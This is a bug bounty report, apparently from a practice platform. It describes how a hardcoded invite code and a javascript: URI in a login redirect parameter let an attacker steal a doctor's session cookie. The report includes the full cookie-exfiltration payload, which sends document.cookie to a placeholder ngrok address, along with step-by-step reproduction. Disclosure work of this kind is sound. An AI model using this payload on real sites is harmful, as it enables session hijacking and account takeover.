BugBountyHunter

Hey mate,

I found that on the register.php endpoint we can register as a new doctor using a inviteCode with the value test, registering as a new doctor and then clicking on a link to the login page from a malicious user, upon the doctor logging via the endpoint login.php they will be sent to our ngrok address where we can steal their drps= token via the parameter goto on the login endpoint.

Impact:

A user can register as a doctor using the inviteCode=test then following a link from a malicious user we can steal the doctors drps= token because of the lack of a httponly flag on the drps cookie.

Steps to Reproduce:

• Visit the endpoint register.php
• Enter a username and in the invite code use test
• Click register and you will now be given credentials.

Request:

Response:

• Click "Continue to login"
• Start our Ngrok server.
• Append the following parameter to the login URL:

  ?goto=javascript:window.location.href=`YOURNGROKADDRESS/${document.cookie}`

• Replace your ngrok address in the payload and Press "Enter"
• Now login with your new credentials and you will be redirected to your ngrok address.

NOTE: You will receive a error and maybe a 404 this is normal.

You will now see the token has been leaked to our ngrok address.

Remediation:

Update filtering to protect against javascript URI redirection.

Best regards,

Amec0e.

In Collaboration with thebinarybot